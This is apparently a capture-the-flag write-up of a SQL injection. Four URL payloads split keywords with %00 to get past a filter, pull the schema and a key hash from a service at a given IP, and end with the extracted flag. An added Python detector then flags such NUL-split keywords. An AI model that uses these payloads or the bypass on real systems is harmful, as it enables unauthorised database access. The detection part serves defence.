The process is as follows:
Get the database name. Result: sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#
Get the tables. Result: hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#
Get the columns of the key table. Result: id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#
Get the final result: 1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef (0x3a == :)
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#
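Seen from the detection side, the requests above get through a keyword check because every blocked keyword is split by %00. The following is an added example, not part of the original write-up. It assumes (the page does not state this) that the filter matches keywords before the NUL bytes are dropped; the keyword list and the function name inspect_query are illustrative.

```python
import re
from urllib.parse import unquote_to_bytes

# Keywords that the requests above split with %00 (illustrative, not a full ruleset).
KEYWORDS = re.compile(rb"\b(union|select|from|information_schema)\b", re.I)


def inspect_query(raw_query: str) -> dict:
    """Classify one raw (still percent-encoded) query string."""
    decoded = unquote_to_bytes(raw_query)
    has_nul = b"\x00" in decoded
    # Naive check: match keywords on the decoded bytes exactly as they arrived.
    naive_hit = KEYWORDS.search(decoded) is not None
    # Canonical check: remove NUL bytes first, then match on what is left.
    canonical = decoded.replace(b"\x00", b"")
    canonical_hit = KEYWORDS.search(canonical) is not None
    return {
        "has_nul": has_nul,
        "naive_hit": naive_hit,
        "canonical_hit": canonical_hit,
        # A NUL byte in a numeric id parameter is itself worth an alert.
        "alert": has_nul or canonical_hit,
    }


# Sample inputs: the first and third are constructed; the second is the
# query string of the first request above, without the trailing '#'.
SAMPLES = [
    "id=42",
    "id=-1 un%00ion se%00lect 3,database()",
    "id=-1 union select 3,database()",
]

if __name__ == "__main__":
    for query in SAMPLES:
        print(query, inspect_query(query))
```

The second sample shows the gap: the naive check misses it, while the canonical check and the NUL-byte test both flag it.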